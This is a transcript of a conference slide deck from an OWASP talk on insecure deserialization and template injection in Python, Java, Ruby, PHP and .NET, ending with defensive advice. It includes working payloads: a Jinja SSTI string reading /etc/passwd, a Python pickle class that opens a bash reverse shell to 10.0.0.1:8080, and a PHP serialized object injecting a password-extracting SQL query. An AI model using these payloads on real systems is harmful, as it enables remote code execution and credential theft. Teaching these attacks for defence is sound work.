Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Vlada Kulish - Why So Serial?

Vlada Kulish - Why So Serial?

Threats to Modern Serialization Capabilities.

28e7d7d55dc88f37db36bfb2f24c6310?s=128

OWASP Kyiv

March 04, 2018
Tweet

Transcript

  1. None
  2. Vlada Kulish Security Engineer OWASP Lviv member

  3. What is de/serialization Why is it important How it works

    and what’s the issue Examples & Demo
  4. Idea

  5. Types BINARY Java, Ruby READABLE YAML, XML, JSON HYBRID Python,

    PHP, Binary XML/JSON
  6. Where it is Communicating data to different systems, process Wire

    protocols, web services Storing and re-using data Databases, cache servers, file systems Tokens HTTP cookies, HTML form parameters, API auth tokens
  7. 2015 - java deserialization apocalypse

  8. Are other languages safe?

  9. None
  10. Server-Side Template Injection http://address/injectedData Server Template {{5*5}} {{5*5}} 25 {{5*5}}

  11. Problem @app.errorhandler(404) def page_not_found(e): template = '''{%% extends "layout.html" %%}

    {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>%s</h3> </div> {%% endblock %%} ''' % (request.url) return render_template_string(template), 404 {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>aaa{{5*5}}</h3> </div> {%% endblock %%}
  12. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

  13. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}} <type 'str'>, <type 'basestring'>, <type 'object'> .__class__.__mro__ [<type

    'type'>, <type 'weakref'>, …, <type 'file'>, <type 'PyCapsule'>….] .__subclasses__()
  14. How it works type class object subclass type params

  15. It's DEMO time:)

  16. Python Pickle Protocol v.0 – ACSII Protocol v.1 – Old

    binary format Protocol v.2 – New binary format
  17. Pickle Virtual Machine Reconstruct a dict from the contents of

    the pickle. Create a class instance of the pickled object. Populate the class instance with the dict elements Instructure engine Stack Memo
  18. GLOBAL and REDUCE Reduce - executes the callable Global –

    loads class object onto the PVM stack
  19. Overwriting Old <Legitimate pickle> New <Inserted shellcode> Result Result of

    inserted shellcode, likely an error
  20. Prepending Old <Legitimate pickle> New <Shellcode and some empty stack><Legitimate

    pickle> Result Original object
  21. Altering Old <Legitimate pickle>…S’<html><h1>AAA…’\n <Legitimate pickle> New <Legitimate pickle>…S’<html><h1>Surprise!…’\n <Legitimate

    pickle> Result Identically-typed object to original with altered attribute value
  22. Injecting Old <Legitimate pickle>…S’<html><body>Foo…’\n <Legitimate pickle> New <Legitimate pickle>…S’<html><body> <Instruction

    returning string>…’\n <Legitimate pickle> Result Identically-typed object to original with new attribute value assigned by executed instructions
  23. Limitations There is no branching instruction There is no comparison

    instruction No exceptions and no error handling A pickle stream cannot overwrite or directly read itself using Pickle instructions Strings loaded in pickles do not undergo variable substitution Class instances and their methods cannot be directly referenced Only callables that are present in the top-level of a module are candidates for loading into the PVM
  24. Vulnerable code filename = ’/tmp/some_file’ pickle.load(open(filename, "rb")) OR def server(skt):

    line = skt.recv(1024) obj = pickle.loads(line)
  25. Vulnerable code def server(skt): line = skt.recv(1024) obj = pickle.loads(line)

    import pickle import socket import os class payload(object): def __reduce__(self): comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1" return (os.system, (comm,)) payload = pickle.dumps( payload())
  26. Useful Links •http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_ Slaviero_Sour_Pickles_WP.pdf •https://exploit-exercises.com/nebula/level17/ •https://blog.nelhage.com/2011/03/exploiting-pickle/

  27. JAVA How to detect AC ED in HEX or R0

    in base64 Java class names in the dump Errors
  28. None
  29. Useful Links https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet https://github.com/frohoff/ysoserial http://jackson.thuraisamy.me/runtime-exec-payloads.html https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-je nkins-opennms-and-your-application-have-in-common-this-vulnerability

  30. Ruby CVE-2013-0156 Ruby on Rails XML processor YAML deserialization code

    execution Unsafe Object Deserialization Vulnerability in RubyGems CVE-2017-0903
  31. Ruby on Rails (<4.1 by default) used Marshal.load() on user

    cookies def reset_password user = Marshal.load(Base64.decode64(params[:user])) unless params[:user].nil? … end <div class="content"> <%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %> … </div>
  32. Useful Links http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-v ulnerability.html https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-l and-cve-2013-0156/ http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execu tion-vulnerability-explained/ https://www.sitepoint.com/anatomy-of-an-exploit-an-in-depth-look-at -the-rails-yaml-vulnerability/

    https://github.com/OWASP/railsgoat/wiki/Extras:-Remote-Code-Executi on
  33. PHP __destruct() __wakeup()

  34. PHP if (isset ($_COOKIE['leet_hax0r'])) { $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));

    …} a:2:{s:2:"ip";s:15:“IP_addr";i:1;O:3:"SQL":2:{s:5:"que ry";s:38:"SELECT password AS username FROM users";s:4:"conn";N;}}
  35. Real-life examples CVE-2015-8562: Joomla Remote Code Execution CVE-2015-7808: vBulletin 5

    Unserialize Code Execution CVE-2015-2171: Slim Framework PHP Object Injection
  36. Useful Links https://blog.checkpoint.com/wp-content/uploads/2016/08/Exp loiting-PHP-7-unserialize-Report-160829.pdf https://www.owasp.org/index.php/PHP_Object_Injection https://www.tarlogic.com/en/blog/how-php-object-injection- works-php-object-injection/ https://pagely.com/blog/2017/05/php-object-injection-insec ure-unserialize-wordpress

  37. .Net CVE-2017-9424 - Breeze.Server.NET CVE-2017-9785 - NANCYFX NANCY UP TO

    1.4.3/2.0 JSON DATA CSRF.CS CVE-2017-9822 - DNN (aka DotNetNuke) before 9.1.1 Remote Code Execution
  38. Useful Links https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/ DEFCON-25-Alvaro-Munoz-JSON-attacks.pdf https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13t h-JSON-Attacks-wp.pdf https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_ Are_You_My_Type_WP.pdf https://blog.scrt.ch/2016/05/12/net-serialiception/

  39. The DEFENCE Avoid magic methods Use as simple formats as

    possible Do not save session state on client Use White and Blacklists for classes Yes, manually serialize/ deserialize complex object Authentication+ Encryption DON’T TRUST DATA – VERIFY IT Use sandboxes
  40. Thank you! Thanks https://explodingkittens.com/ for good mood and design ideas!